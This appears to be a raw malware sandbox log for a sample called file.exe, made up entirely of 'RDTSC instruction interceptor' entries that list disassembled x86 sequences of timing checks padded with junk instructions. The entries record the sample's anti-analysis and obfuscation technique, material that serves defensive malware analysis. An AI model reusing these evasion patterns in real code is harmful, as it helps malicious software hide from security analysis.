Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48D352 second address: 48D383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919488h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F86A1919476h 0x0000000f jmp 00007F86A191947Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 40573B second address: 4057A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8107h 0x00000007 jg 00007F86A0EA810Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 jmp 00007F86A0EA80FFh 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F86A0EA8107h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44808A second address: 44808E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44808E second address: 4480CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F86A0EA80F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F86A0EA80FCh 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F86A0EA8107h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4480CA second address: 4480CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4480CE second address: 4480D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4480D4 second address: 4480D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4480D9 second address: 4480F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F86A0EA80F6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jl 00007F86A0EA80FEh 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4480F3 second address: 44810D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 or dword ptr [ebp+122D35F9h], edi 0x0000000c push 04B81729h 0x00000011 jng 00007F86A1919484h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 44810D second address: 448113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4481D7 second address: 4481E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F86A1919476h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448261 second address: 448267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448CB8 second address: 448CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, si 0x0000000d mov di, 7EE4h 0x00000011 lea eax, dword ptr [ebp+1247C82Dh] 0x00000017 nop 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F86A1919485h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448CE8 second address: 448CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448CEC second address: 448D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86A1919481h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448D09 second address: 448D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F86A0EA80F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F86A0EA80F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C4BC second address: 48C4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C787 second address: 48C78D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C78D second address: 48C797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C797 second address: 48C7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F86A0EA80FEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C8CD second address: 48C8EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A1919489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48C8EE second address: 48C8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F86A0EA80F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CAAB second address: 48CAB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CD9A second address: 48CDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CDA0 second address: 48CDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CDA7 second address: 48CDB3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CDB3 second address: 48CDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CDBC second address: 48CDE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F86A0EA8109h 0x0000000d jnl 00007F86A0EA80F6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48CDE3 second address: 48CDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 493020 second address: 493049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F86A0EA80FFh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F86A0EA8103h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49210A second address: 492110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492257 second address: 4922A3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F86A0EA80FEh 0x00000008 pushad 0x00000009 jmp 00007F86A0EA80FEh 0x0000000e ja 00007F86A0EA80F6h 0x00000014 jmp 00007F86A0EA80FAh 0x00000019 js 00007F86A0EA80F6h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push esi 0x00000023 jnc 00007F86A0EA80FCh 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49241E second address: 492441 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F86A1919476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jp 00007F86A1919476h 0x00000013 jmp 00007F86A191947Fh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49259F second address: 4925CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8107h 0x00000007 jnl 00007F86A0EA80F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F86A0EA80FCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 492701 second address: 492722 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F86A1919487h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4929DC second address: 4929E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4960DD second address: 4960F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jg 00007F86A1919476h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496233 second address: 496238 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 496238 second address: 496265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jmp 00007F86A191947Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F86A1919496h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F86A1919482h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 497A3E second address: 497A44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49AA3C second address: 49AA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F86A191947Fh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F86A191947Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49AA5E second address: 49AA6E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F86A0EA8102h 0x00000008 jbe 00007F86A0EA80F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A350 second address: 49A35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F86A1919476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A35A second address: 49A371 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F86A0EA80FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A371 second address: 49A375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A375 second address: 49A379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A4AE second address: 49A4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 ja 00007F86A1919476h 0x0000000c jmp 00007F86A1919489h 0x00000011 jnp 00007F86A1919476h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A4DA second address: 49A4E4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F86A0EA80FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49A4E4 second address: 49A50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F86A1919499h 0x0000000c jmp 00007F86A1919483h 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jne 00007F86A1919476h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1FD0 second address: 4A1FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A07AB second address: 4A07C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F86A1919476h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F86A191947Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0BE2 second address: 4A0BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0D4A second address: 4A0D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F86A191947Eh 0x0000000b jc 00007F86A1919476h 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 jmp 00007F86A1919489h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F86A1919482h 0x00000020 jp 00007F86A1919476h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0D9A second address: 4A0D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0D9E second address: 4A0DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007F86A1919476h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DAE second address: 4A0DB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DB8 second address: 4A0DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0DBE second address: 4A0DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 448769 second address: 44876F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A107B second address: 4A107F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A107F second address: 4A108E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A108E second address: 4A1099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A1099 second address: 4A10A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A191947Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3602 second address: 4A3608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A617D second address: 4A6183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6183 second address: 4A6187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A6187 second address: 4A618B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A62D8 second address: 4A62E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FDh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A62E9 second address: 4A630F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jl 00007F86A1919476h 0x0000000d pop edi 0x0000000e pushad 0x0000000f jmp 00007F86A1919483h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FECAA second address: 3FECBC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F86A0EA80F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F86A0EA80F6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB715 second address: 4AB736 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F86A1919476h 0x00000008 jmp 00007F86A1919487h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB736 second address: 4AB76C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F86A0EA811Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F86A0EA80F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB8E8 second address: 4AB8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB8EC second address: 4AB911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8103h 0x00000007 jmp 00007F86A0EA80FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 403CDD second address: 403CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 403CE1 second address: 403CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 403CE7 second address: 403CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 403CED second address: 403D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA8106h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F86A0EA80F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 403D0D second address: 403D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B169C second address: 4B16A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F86A0EA80F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B20E3 second address: 4B210B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007F86A1919476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F86A1919488h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B210B second address: 4B2119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F86A0EA80FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2119 second address: 4B2125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B26BD second address: 4B26E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F86A0EA80FCh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F86A0EA80FFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2F4C second address: 4B2F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B2F52 second address: 4B2F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B8A91 second address: 4B8A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCB08 second address: 4BCB18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F86A0EA80F6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BCB18 second address: 4BCB1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC438 second address: 4BC43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC70C second address: 4BC72E instructions: 0x00000000 rdtsc 0x00000002 je 00007F86A1919476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F86A1919482h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BC72E second address: 4BC732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4613 second address: 4C4619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4619 second address: 4C4639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F86A0EA8108h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4639 second address: 4C4640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4640 second address: 4C4667 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F86A0EA80F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F86A0EA8109h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
